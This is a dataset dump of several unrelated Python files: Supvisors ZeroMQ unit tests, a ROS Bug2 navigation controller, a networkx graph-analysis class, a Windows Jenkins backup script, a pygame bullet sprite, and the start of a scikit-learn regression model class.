self.subscriber.unsubscribe_process_status()\n self.check_subscription(False, False, False, False, False)\n\n def test_subscription_all_status(self):\n \"\"\" Test the reception of all status messages\n when related subscription is set. \"\"\"\n # subscribe to every status\n self.subscriber.subscribe_all()\n self.check_subscription(True, True, True, True, True)\n # unsubscribe all\n self.subscriber.unsubscribe_all()\n self.check_subscription(False, False, False, False, False)\n\n def test_subscription_multiple_status(self):\n \"\"\" Test the reception of multiple status messages\n when related subscription is set. \"\"\"\n # subscribe to Application and Process Event\n self.subscriber.subscribe_application_status()\n self.subscriber.subscribe_process_event()\n self.check_subscription(False, False, True, True, False)\n # set subscription to Address and Process Status\n self.subscriber.unsubscribe_application_status()\n self.subscriber.unsubscribe_process_event()\n self.subscriber.subscribe_process_status()\n self.subscriber.subscribe_address_status()\n self.check_subscription(False, True, False, False, True)\n # add subscription to Supvisors Status\n self.subscriber.subscribe_supvisors_status()\n self.check_subscription(True, True, False, False, True)\n # unsubscribe all\n self.subscriber.unsubscribe_supvisors_status()\n self.subscriber.unsubscribe_address_status()\n self.subscriber.unsubscribe_process_status()\n self.check_subscription(False, False, False, False, False)\n\n\nclass SupervisorZmqTest(unittest.TestCase):\n \"\"\" Test case for the SupervisorZmq class of the supvisorszmq module. \"\"\"\n\n def setUp(self):\n \"\"\" Create a dummy supvisors. \"\"\"\n self.supvisors = MockedSupvisors()\n\n def test_creation_closure(self):\n \"\"\" Test the types of the attributes created. 
\"\"\"\n from supvisors.supvisorszmq import (SupervisorZmq, EventPublisher,\n InternalEventPublisher, RequestPusher)\n sockets = SupervisorZmq(self.supvisors)\n # test all attribute types\n self.assertIsInstance(sockets.publisher, EventPublisher)\n self.assertFalse(sockets.publisher.socket.closed)\n self.assertIsInstance(sockets.internal_publisher,\n InternalEventPublisher)\n self.assertFalse(sockets.internal_publisher.socket.closed)\n self.assertIsInstance(sockets.pusher, RequestPusher)\n self.assertFalse(sockets.pusher.socket.closed)\n # close the instance\n sockets.close()\n self.assertTrue(sockets.publisher.socket.closed)\n self.assertTrue(sockets.internal_publisher.socket.closed)\n self.assertTrue(sockets.pusher.socket.closed)\n\n\nclass SupvisorsZmqTest(unittest.TestCase):\n \"\"\" Test case for the SupvisorsZmq class of the supvisorszmq module. \"\"\"\n\n def setUp(self):\n \"\"\" Create a dummy supvisors. \"\"\"\n self.supvisors = MockedSupvisors()\n\n def test_creation_closure(self):\n \"\"\" Test the types of the attributes created. \"\"\"\n from supvisors.supvisorszmq import (SupvisorsZmq,\n InternalEventSubscriber, RequestPuller)\n sockets = SupvisorsZmq(self.supvisors)\n # test all attribute types\n self.assertIsInstance(sockets.internal_subscriber,\n InternalEventSubscriber)\n self.assertFalse(sockets.internal_subscriber.socket.closed)\n self.assertIsInstance(sockets.puller, RequestPuller)\n self.assertFalse(sockets.puller.socket.closed)\n # close the instance\n sockets.close()\n self.assertTrue(sockets.internal_subscriber.socket.closed)\n self.assertTrue(sockets.puller.socket.closed)\n\n\ndef test_suite():\n return unittest.findTestCases(sys.modules[__name__])\n\nif __name__ == '__main__':\n unittest.main(defaultTest='test_suite')\n\n", "sub_path": "supvisors/tests/test_supvisorszmq.py", "file_name": "test_supvisorszmq.py", "file_ext": "py", "file_size_in_byte": 26903, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "unittest.TestCase", "line_number": 29, "usage_type": "attribute"}, {"api_name": "supvisors.tests.base.MockedSupvisors", "line_number": 35, "usage_type": "call"}, {"api_name": "zmq.Context.instance", "line_number": 37, "usage_type": "call"}, {"api_name": "zmq.Context", "line_number": 37, "usage_type": "attribute"}, {"api_name": "supvisors.supvisorszmq.InternalEventPublisher", "line_number": 45, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.InternalEventSubscriber", "line_number": 49, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.EventPublisher", "line_number": 69, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.EventSubscriber", "line_number": 70, "usage_type": "call"}, {"api_name": "zmq.Context.instance", "line_number": 70, "usage_type": "call"}, {"api_name": "zmq.Context", "line_number": 70, "usage_type": "attribute"}, {"api_name": "supvisors.supvisorszmq.RequestPusher", "line_number": 86, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.RequestPuller", "line_number": 87, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 99, "usage_type": "attribute"}, {"api_name": "supvisors.tests.base.MockedSupvisors", "line_number": 108, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.InternalEventPublisher", "line_number": 110, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.InternalEventSubscriber", "line_number": 114, "usage_type": "call"}, {"api_name": "zmq.RCVTIMEO", "line_number": 120, "usage_type": 
"attribute"}, {"api_name": "time.sleep", "line_number": 123, "usage_type": "call"}, {"api_name": "zmq.Again", "line_number": 136, "usage_type": "attribute"}, {"api_name": "supvisors.utils.InternalEventHeaders.TICK", "line_number": 154, "usage_type": "attribute"}, {"api_name": "supvisors.utils.InternalEventHeaders", "line_number": 154, "usage_type": "name"}, {"api_name": "zmq.Again", "line_number": 161, "usage_type": "attribute"}, {"api_name": "supvisors.utils.InternalEventHeaders.TICK", "line_number": 174, "usage_type": "attribute"}, {"api_name": "supvisors.utils.InternalEventHeaders", "line_number": 174, "usage_type": "name"}, {"api_name": "supvisors.utils.InternalEventHeaders.PROCESS", "line_number": 187, "usage_type": "attribute"}, {"api_name": "supvisors.utils.InternalEventHeaders", "line_number": 187, "usage_type": "name"}, {"api_name": "supvisors.utils.InternalEventHeaders.STATISTICS", "line_number": 200, "usage_type": "attribute"}, {"api_name": "supvisors.utils.InternalEventHeaders", "line_number": 200, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 204, "usage_type": "attribute"}, {"api_name": "supvisors.tests.base.MockedSupvisors", "line_number": 212, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.RequestPusher", "line_number": 214, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.RequestPuller", "line_number": 215, "usage_type": "call"}, {"api_name": "zmq.SNDTIMEO", "line_number": 219, "usage_type": "attribute"}, {"api_name": "zmq.RCVTIMEO", "line_number": 220, "usage_type": "attribute"}, {"api_name": "zmq.Again", "line_number": 232, "usage_type": "attribute"}, {"api_name": "supvisors.utils.DeferredRequestHeaders.CHECK_ADDRESS", "line_number": 241, "usage_type": "attribute"}, {"api_name": "supvisors.utils.DeferredRequestHeaders", "line_number": 241, "usage_type": "name"}, {"api_name": "supvisors.utils.DeferredRequestHeaders.ISOLATE_ADDRESSES", "line_number": 257, "usage_type": "attribute"}, {"api_name": "supvisors.utils.DeferredRequestHeaders", "line_number": 257, "usage_type": "name"}, {"api_name": "supvisors.utils.DeferredRequestHeaders.START_PROCESS", "line_number": 275, "usage_type": "attribute"}, {"api_name": "supvisors.utils.DeferredRequestHeaders", "line_number": 275, "usage_type": "name"}, {"api_name": "supvisors.utils.DeferredRequestHeaders.STOP_PROCESS", "line_number": 293, "usage_type": "attribute"}, {"api_name": "supvisors.utils.DeferredRequestHeaders", "line_number": 293, "usage_type": "name"}, {"api_name": "supvisors.utils.DeferredRequestHeaders.RESTART", "line_number": 309, "usage_type": "attribute"}, {"api_name": "supvisors.utils.DeferredRequestHeaders", "line_number": 309, "usage_type": "name"}, {"api_name": "supvisors.utils.DeferredRequestHeaders.SHUTDOWN", "line_number": 325, "usage_type": "attribute"}, {"api_name": "supvisors.utils.DeferredRequestHeaders", "line_number": 325, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 346, "usage_type": "attribute"}, {"api_name": "supvisors.tests.base.MockedSupvisors", "line_number": 354, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.EventPublisher", "line_number": 357, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.EventSubscriber", "line_number": 360, "usage_type": "call"}, {"api_name": "zmq.Context.instance", "line_number": 361, "usage_type": "call"}, {"api_name": "zmq.Context", "line_number": 361, "usage_type": "attribute"}, {"api_name": "zmq.RCVTIMEO", "line_number": 370, "usage_type": "attribute"}, {"api_name": 
"zmq.Again", "line_number": 400, "usage_type": "attribute"}, {"api_name": "zmq.Again", "line_number": 405, "usage_type": "attribute"}, {"api_name": "supvisors.utils.EventHeaders.SUPVISORS", "line_number": 414, "usage_type": "attribute"}, {"api_name": "supvisors.utils.EventHeaders", "line_number": 414, "usage_type": "name"}, {"api_name": "supvisors.utils.EventHeaders.ADDRESS", "line_number": 425, "usage_type": "attribute"}, {"api_name": "supvisors.utils.EventHeaders", "line_number": 425, "usage_type": "name"}, {"api_name": "supvisors.utils.EventHeaders.APPLICATION", "line_number": 436, "usage_type": "attribute"}, {"api_name": "supvisors.utils.EventHeaders", "line_number": 436, "usage_type": "name"}, {"api_name": "supvisors.utils.EventHeaders.PROCESS_EVENT", "line_number": 449, "usage_type": "attribute"}, {"api_name": "supvisors.utils.EventHeaders", "line_number": 449, "usage_type": "name"}, {"api_name": "supvisors.utils.EventHeaders.PROCESS_STATUS", "line_number": 459, "usage_type": "attribute"}, {"api_name": "supvisors.utils.EventHeaders", "line_number": 459, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 468, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 564, "usage_type": "attribute"}, {"api_name": "supvisors.tests.base.MockedSupvisors", "line_number": 569, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.SupervisorZmq", "line_number": 575, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.EventPublisher", "line_number": 577, "usage_type": "name"}, {"api_name": "supvisors.supvisorszmq.InternalEventPublisher", "line_number": 580, "usage_type": "name"}, {"api_name": "supvisors.supvisorszmq.RequestPusher", "line_number": 582, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 591, "usage_type": "attribute"}, {"api_name": "supvisors.tests.base.MockedSupvisors", "line_number": 596, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.SupvisorsZmq", "line_number": 602, "usage_type": "call"}, {"api_name": "supvisors.supvisorszmq.InternalEventSubscriber", "line_number": 605, "usage_type": "name"}, {"api_name": "supvisors.supvisorszmq.RequestPuller", "line_number": 607, "usage_type": "name"}, {"api_name": "unittest.findTestCases", "line_number": 616, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 616, "usage_type": "attribute"}, {"api_name": "unittest.main", "line_number": 619, "usage_type": "call"}]} +{"seq_id": "368280479", "text": "#!/usr/bin/env python\nimport roslib\nfrom visualization_msgs.msg import Marker\nfrom visualization_msgs.msg import MarkerArray\nimport rospy\nimport math\nimport geometry_msgs\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import LaserScan\nfrom std_msgs.msg import Float32\nfrom nav_msgs.msg import Odometry\nimport numpy as np\nimport sys\nimport tf\nfrom math import radians\n# ref wiki.ros.org/rviz \ninput = np.empty(shape= [0,2])\npos_x = 0\npos_y = 0\norien_z = 0\nlaser_ranges = []\npi = 3.14\nwall_line = []\n\ndef ExtractPointsFromBaseScan(data):\n input = np.empty(shape= [0,2])\n global laser_ranges\n laser_ranges = data.ranges\n angle = data.angle_min \n points_list = []\n ran = range(150,270)\n for index, r in enumerate(data.ranges):\n if r < 3.0 and index in ran:\n x = r * np.cos(angle)\n y = r * np.sin(angle) \n input = np.append(input, [[x,y]], axis=0)\n angle = angle + data.angle_increment\n RansacImplementation(input)\n\ndef FindDistanceToALine(p1, p2, p):\n x1 = p1[0]\n y1 = p1[1]\n x2 = p2[0]\n y2 = p2[1]\n x = p[0]\n y = p[1]\n 
denominator = math.sqrt((x2 - x1)**2 + (y2 - y1)**2)\n numerator = abs((y2-y1)*x - (x2-x1)*y + x2*y1 - y2*x1)\n distance = (numerator/denominator)\n return distance\n\ndef FindDistance(p1, p2):\n x1 = p1[0]\n y1 = p1[1]\n x2 = p2[0]\n y2 = p2[1]\n denominator = math.sqrt((x2 - x1)**2 + (y2 - y1)**2)\n return denominator < 2\n\ndef createPoint(x,y):\n p = geometry_msgs.msg.Point()\n p.x = x\n p.y = y\n p.z = 0\n return p\n\ndef CheckForZero(p):\n return p[0] == 0 or p[1] == 0\n\ndef RansacImplementation(input):\n global wall_line\n if(input.shape[0] == 0):\n return\n # Ransac parameters\n ransac_iterations = 5 # number of iterations\n ransac_threshold = 0.05 # threshold\n ransac_ratio = 0.8 \n\n ratio = 0.0 \n points_list = [] \n model = []\n model_inliers = []\n for i in range(ransac_iterations):\n shuffle = np.random.shuffle(input)\n initial_points = input[0:2]\n test_points = input[2:]\n inliers = np.empty(shape= [0,2])\n num_of_inliers = 0.0\n for j in range(test_points.shape[0]):\n dis = FindDistanceToALine(initial_points[0], initial_points[1], test_points[j])\n if(dis < ransac_threshold):\n inliers = np.append(inliers, [test_points[j]], axis=0)\n num_of_inliers += 1\n if(num_of_inliers/float(test_points.shape[0]) > ratio):\n ratio = num_of_inliers/float(test_points.shape[0])\n model = initial_points\n model_inliers = inliers\n\n if(len(model) != 0):\n points_list.append(createPoint(model[0][0], model[0][1]))\n points_list.append(createPoint(model[1][0], model[1][1]))\n CreateLinesMarker(points_list, 0)\n\n #if not (FindDistance(model[0], model[1])):\n wall_line = model\n\n\ndef CreateLinesMarker(lines_list, id):\n rate = rospy.Rate(1)\n lines = Marker()\n lines.header.frame_id = \"/base_laser_link\"\n lines.ns = \"points_and_lines\"\n lines.header.stamp = rospy.Time.now()\n lines.id = id\n lines.pose.orientation.w = 1.0\n lines.action = Marker.ADD\n lines.type = Marker.LINE_LIST\n lines.scale.x = 0.3\n lines.scale.y = 0.\n if(id == 1):\n lines.color.g = 1.0\n else:\n lines.color.b = 1.0\n lines.color.a = 1.0\n t = rospy.Duration()\n lines.lifetime = t\n\n lines.points = lines_list\n # Publish the MarkerArray\n publisher.publish(lines) \n #rate.sleep()\n\ndef CallbackBPGT(msg):\n global orien_z, pos_x, pos_y\n msg_pos = msg.pose.pose.position\n msg_or = msg.pose.pose.orientation\n pos_x = msg_pos.x\n pos_y = msg_pos.y\n orien = tf.transformations.euler_from_quaternion([ msg_or.x, msg_or.y, msg_or.z, msg_or.w])\n orien_z = orien[2]\n\ndef CheckObstaclesInTheWay():\n global laser_ranges\n obstacles = 0\n if(len(laser_ranges) != 0):\n for r in range(170, 210):\n if(laser_ranges[r] < 1.5):\n obstacles += 1\n return obstacles > 0\n\ndef CheckObstaclesInTheFront():\n print('checking')\n global laser_ranges\n obstacles = 0\n if(len(laser_ranges) != 0):\n for r in range(50, 210):\n if(laser_ranges[r] < 1.5):\n obstacles += 1\n return obstacles > 0\n\ndef CheckObstaclesInTheLeft():\n global laser_ranges\n obstacles = 0\n if(len(laser_ranges) != 0):\n for r in range(90, 170):\n if(laser_ranges[r] < 1):\n obstacles += 1\n return obstacles > 5\n\ndef ComputeAng_VelForGS(goal_angle):\n if(abs(goal_angle) < pi/10):\n return 0\n return goal_angle\n\ndef ComputeAng_VelForWF(line, robot_angle):\n slope = (line[1][1] - line[0][1])/(line[1][0] - line[0][0])\n print(\" line slope = %s\" % math.atan(slope))\n \"\"\" if(abs(math.atan(slope) - robot_angle) < pi/10):\n return 0 \"\"\"\n return math.atan(slope) - robot_angle\n\ndef setVelocity(linear_vel, angular_vel):\n cmd = Twist()\n cmd.linear.x = 
linear_vel\n cmd.angular.z = angular_vel\n vel_pub.publish(cmd)\n\n\ndef bug2_implementation():\n global orien_z, pos_x, pos_y, wall_line\n atGoal = False\n goal = [4.5, 9.0]\n threshold_distance = 0.5\n linear_vel = 0 \n angular_vel = 0\n robot_state = 'GOALSEEK'\n line = []\n cmd = Twist()\n x = pos_x\n y = pos_y\n while not atGoal:\n print('===============================================')\n\n goal_distance = math.sqrt((goal[0]-pos_x)**2 + (goal[1]-pos_y)**2)\n robot_angle = orien_z #yaw\n goal_slope = math.atan((goal[1]-y)/(goal[0]-x))\n goal_angle = goal_slope - robot_angle\n points_list = [] \n points_list.append(createPoint(pos_x, pos_y))\n points_list.append(createPoint(goal[0], goal[1]))\n CreateLinesMarker(points_list, 2)\n print('goal_distance %s' % goal_distance)\n print('robot_angle %s' % robot_angle)\n print('goal_slope %s' % goal_slope) \n print('goal_angle %s' % goal_angle) \n\n if(goal_distance < threshold_distance):\n linear_vel = 0\n angular_vel = 0\n atGoal = True\n else:\n print('State %s' % robot_state)\n if(robot_state == 'GOALSEEK'):\n angular_vel = ComputeAng_VelForGS(goal_angle)\n linear_vel = 2.5\n if(CheckObstaclesInTheFront()):\n cmd.linear.x = 0\n \n robot_state = 'WALLFOLLOW'\n line = wall_line\n points_list = [] \n points_list.append(createPoint(line[0][0], line[0][1]))\n points_list.append(createPoint(line[1][0], line[1][1]))\n CreateLinesMarker(points_list, 1)\n print('Obstacles are there - line %s' % line)\n \n if(robot_state == 'WALLFOLLOW'):\n angular_vel = ComputeAng_VelForWF(wall_line, robot_angle)\n print('angular vel %s' % angular_vel)\n cmd.linear.x = 0\n cmd.angular.z = angular_vel\n vel_pub.publish(cmd)\n linear_vel = 0.3\n angular_vel = 0\n points_list.append(createPoint(wall_line[0][0], wall_line[0][1]))\n points_list.append(createPoint(wall_line[1][0], wall_line[1][1]))\n CreateLinesMarker(points_list, 1)\n if not CheckObstaclesInTheWay():\n print('front clear')\n linear_vel = 0.8\n \"\"\" if(CheckObstaclesInTheLeft()):\n line = wall_line\n angular_vel = ComputeAng_VelForWF(line, robot_angle) \"\"\"\n if not CheckObstaclesInTheFront():\n robot_state = 'GOALSEEK'\n \n\n print('Final State %s' % robot_state)\n print('Linear vel %s' % linear_vel)\n print('angular vel %s' % angular_vel)\n setVelocity(linear_vel, angular_vel)\n print('===============================================')\n rospy.sleep(1.0)\n \n\nif __name__ == '__main__':\n rospy.init_node('bug2_controller')\n vel_pub = rospy.Publisher('cmd_vel', Twist, queue_size=5)\n publisher = rospy.Publisher(\"visualization_marker\", Marker, queue_size=10)\n rospy.Subscriber(\"base_scan\", LaserScan, ExtractPointsFromBaseScan)\n rospy.Subscriber('base_pose_ground_truth', Odometry, CallbackBPGT)\n bug2_implementation()\n print(\"done\") \n rospy.spin() \n", "sub_path": "lab2/src/bug2.py", "file_name": "bug2.py", "file_ext": "py", "file_size_in_byte": 8586, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.empty", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 36, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 47, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 57, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Point", "line_number": 61, 
"usage_type": "call"}, {"api_name": "geometry_msgs.msg", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 84, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 92, "usage_type": "call"}, {"api_name": "rospy.Rate", "line_number": 109, "usage_type": "call"}, {"api_name": "visualization_msgs.msg.Marker", "line_number": 110, "usage_type": "call"}, {"api_name": "rospy.Time.now", "line_number": 113, "usage_type": "call"}, {"api_name": "rospy.Time", "line_number": 113, "usage_type": "attribute"}, {"api_name": "visualization_msgs.msg.Marker.ADD", "line_number": 116, "usage_type": "attribute"}, {"api_name": "visualization_msgs.msg.Marker", "line_number": 116, "usage_type": "name"}, {"api_name": "visualization_msgs.msg.Marker.LINE_LIST", "line_number": 117, "usage_type": "attribute"}, {"api_name": "visualization_msgs.msg.Marker", "line_number": 117, "usage_type": "name"}, {"api_name": "rospy.Duration", "line_number": 125, "usage_type": "call"}, {"api_name": "tf.transformations.euler_from_quaternion", "line_number": 139, "usage_type": "call"}, {"api_name": "tf.transformations", "line_number": 139, "usage_type": "attribute"}, {"api_name": "math.atan", "line_number": 177, "usage_type": "call"}, {"api_name": "math.atan", "line_number": 180, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Twist", "line_number": 183, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Twist", "line_number": 198, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 204, "usage_type": "call"}, {"api_name": "math.atan", "line_number": 206, "usage_type": "call"}, {"api_name": "rospy.sleep", "line_number": 263, "usage_type": "call"}, {"api_name": "rospy.init_node", "line_number": 267, "usage_type": "call"}, {"api_name": "rospy.Publisher", "line_number": 268, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Twist", "line_number": 268, "usage_type": "argument"}, {"api_name": "rospy.Publisher", "line_number": 269, "usage_type": "call"}, {"api_name": "visualization_msgs.msg.Marker", "line_number": 269, "usage_type": "argument"}, {"api_name": "rospy.Subscriber", "line_number": 270, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.LaserScan", "line_number": 270, "usage_type": "argument"}, {"api_name": "rospy.Subscriber", "line_number": 271, "usage_type": "call"}, {"api_name": "nav_msgs.msg.Odometry", "line_number": 271, "usage_type": "argument"}, {"api_name": "rospy.spin", "line_number": 274, "usage_type": "call"}]} +{"seq_id": "449166886", "text": "from fragility.analyzers.graphanalysis.base import BaseGraphModel\n\nimport networkx as nx \nimport numpy as np \n\n'''\nGraphanalysis.py\n@By: Adam Li\n@Date: 4/20/18\n\n@Description: Basic class wrapper for using networkx package to implement\npython graph analysis of an adjacency matrix and output graph theoretic measures\nin a list.\n\nPass in a full time series of adjacency matrices, and then call the 'run()' function\nto compute a list of graph theoretic measures for each node in the matrix.\n\nOptional to threshold the adjaceny matrices beforehand with a pre-set threshold.\n\n'''\n\nclass TimeVaryingGraph(BaseGraphModel):\n # initialize list of graph theoretic measures\n indegrees = []\n outdegrees = []\n betweencents = []\n eigcents = []\n\n graph_measures_time = []\n\n def __init__(self, config=None):\n super(TimeVaryingGraph, 
self).__init__(config=config)\n\n def run(self, adjmats, thresh=None):\n # make sure the adjacency matrices are all positive\n adjmats = np.abs(adjmats)\n assert adjmats.ndim == 3\n assert adjmats.shape[1] == adjmats.shape[2] \n \n # apply threshold\n if thresh is not None:\n assert thresh > 0.0 and thresh < 1.0\n adjmats = self._thresh(adjmats, thresh)\n\n for iwin in range(adjmats.shape[0]):\n adjmat = adjmats[iwin,...].squeeze()\n\n # compute graph measures on this one matrix\n G = nx.from_numpy_array(adjmat,\n create_using=nx.DiGraph())\n self._compute_indegree(G)\n self._compute_outdegree(G)\n self._compute_betweencent(G)\n self._compute_eigcent(G)\n\n def fcd_speed(self, adjmats, thresh=None):\n \"\"\"\n Function to implement the functional connectivity dynamics\n of the matrices over time. \n\n This is to characterize the speed, acceleration and group statistics.\n \"\"\"\n pass\n\n\n\n\n\n", "sub_path": "fragility/analyzers/graphanalysis/timevarying.py", "file_name": "timevarying.py", "file_ext": "py", "file_size_in_byte": 1950, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "fragility.analyzers.graphanalysis.base.BaseGraphModel", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 36, "usage_type": "call"}, {"api_name": "networkx.from_numpy_array", "line_number": 49, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "1882086", "text": "'''\narchive Jenkins home on windows\n\n'''\n\nimport configparser\nimport os\nimport datetime\nfrom zip import Zip\nimport time\nimport zipfile\n\n#date and time\n\nnow = datetime.datetime.now()\ncurrent_date_time = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n#load config\n\nconfig = configparser.ConfigParser()\nconfig.read('global.cfg')\njenkins_backup_retention = config['ARCHIVE']['jenkins_backup_retention']\njenkins_backup_location = config['ARCHIVE']['jenkins_backup_location']\n\n#stage files for archive\n\nnow_file_stamp = now.strftime(\"%Y-%m-%d_%H%M%S\")\njenkins_backup_file_name = 'jenkins_full_backup_'+now_file_stamp\nzip_file_name = 'jenkins_full_backup_'+now_file_stamp+'.zip'\nos.system('mkdir E:\\\\backups\\\\jenkins_full_backups\\\\'+ jenkins_backup_file_name )\ntime.sleep(5)\nos.system('ROBOCOPY E:\\\\Jenkins\\\\ E:\\\\backups\\\\jenkins_full_backups\\\\'+ jenkins_backup_file_name +' /E')\n\n#create the compressed archive\n\nzipf = zipfile.ZipFile('E:\\\\backups\\\\jenkins_full_backups\\\\'+zip_file_name, 'w', zipfile.ZIP_DEFLATED)\nzf = Zip()\nzf.ZipDir('E:\\\\backups\\\\jenkins_full_backups\\\\',zipf)\nzipf.close()\n\nos.system('rmdir E:\\\\backups\\\\jenkins_full_backups\\\\'+ jenkins_backup_file_name+' /s /q')\n\n\n\n\n\n", "sub_path": "archive.py", "file_name": "archive.py", "file_ext": "py", "file_size_in_byte": 1171, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "datetime.datetime.now", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 20, "usage_type": "call"}, {"api_name": "os.system", "line_number": 30, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "os.system", "line_number": 32, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 36, "usage_type": "call"}, {"api_name": 
"zipfile.ZIP_DEFLATED", "line_number": 36, "usage_type": "attribute"}, {"api_name": "zip.Zip", "line_number": 37, "usage_type": "call"}, {"api_name": "os.system", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "95413059", "text": "#!/user/bin/python3\n# -*- coding = utf-8 -*-\n# @Time : 2021/2/7\n# @Author : 郑煜辉\n# @File : Peashooter\n\nimport pygame\n\n\nclass Buttet(pygame.sprite.Sprite):\n def __init__(self,plant):\n super(Buttet,self).__init__()\n self.images = pygame.image.load('images/bullets/peaBullet.png').convert_alpha()\n self.rect = self.images.get_rect()\n self.rect.left = plant.zone[0]+35\n self.rect.top = plant.zone[1]\n self.speed = 15\n self.status = True\n self.attact = 1\n\n def move(self):\n if self.rect.left<1200:\n self.rect.left+=self.speed\n else:\n self.status = False\n\n\n\n\n def hit(self,enemyList):\n for enemy in enemyList:\n if pygame.sprite.collide_circle_ratio(0.5)(enemy,self):\n enemy.blood-=self.attact\n if enemy.blood == 0:\n enemy.is_live = False\n self.status = False\n", "sub_path": "bullet.py", "file_name": "bullet.py", "file_ext": "py", "file_size_in_byte": 941, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pygame.sprite", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 13, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pygame.sprite.collide_circle_ratio", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 32, "usage_type": "attribute"}]} +{"seq_id": "170636816", "text": "import numpy as np\nimport pandas as pd\nimport scipy \n# import boruta\n# from boruta import BorutaPy\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.linear_model import LinearRegression, Ridge, Lasso\nfrom sklearn.svm import SVR\nfrom sklearn.ensemble import BaggingRegressor\nfrom sklearn.kernel_ridge import KernelRidge\nfrom sklearn.ensemble import BaggingRegressor\nfrom sklearn.pipeline import make_pipeline, Pipeline\nfrom sklearn.preprocessing import StandardScaler, RobustScaler, MinMaxScaler\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.utils.fixes import loguniform\n\n\nclass CCARD_MODEL(): \n \n \"\"\"\n This class implements CCARD level model with feature selection\n \n Parameters\n ----------\n feature_selection : bool\n Perform feature selection or not\n hyperparameter_tuning : bool\n Tune the model or not\n model_name : str\n Name of the model (default is ridge)\n Support 'ridge', 'SVR' in backcast function\n transformation: str\n 'log' or 'sqrt' transformation of y\n random_state: int\n set seed for the model \n \n \"\"\"\n \n # some class variables\n LASSO_FEATURE_SELECTION_PENALTY = 0.005 # gives good number of features ~ 50 \n RIDGE_PENALTY = 0.001 # default choice with little penalization\n SVR_C, SVR_epislon = 10.0, 0.2 # from Vicky's model \n EPSILON_LOG_ACTUAL = 0.001\n \n \n def __init__(self, feature_selection = False, hyperparameter_tuning = True, training_to = None, model_name = 'ridge', transformation = 'log', random_state=0): \n \n self.random_state = random_state\n self.training_to = training_to\n self.feature_selection = feature_selection\n self.model_name = model_name\n self.transformation = transformation\n self.selected_cols = None\n self.hyperparameter_tuning = 
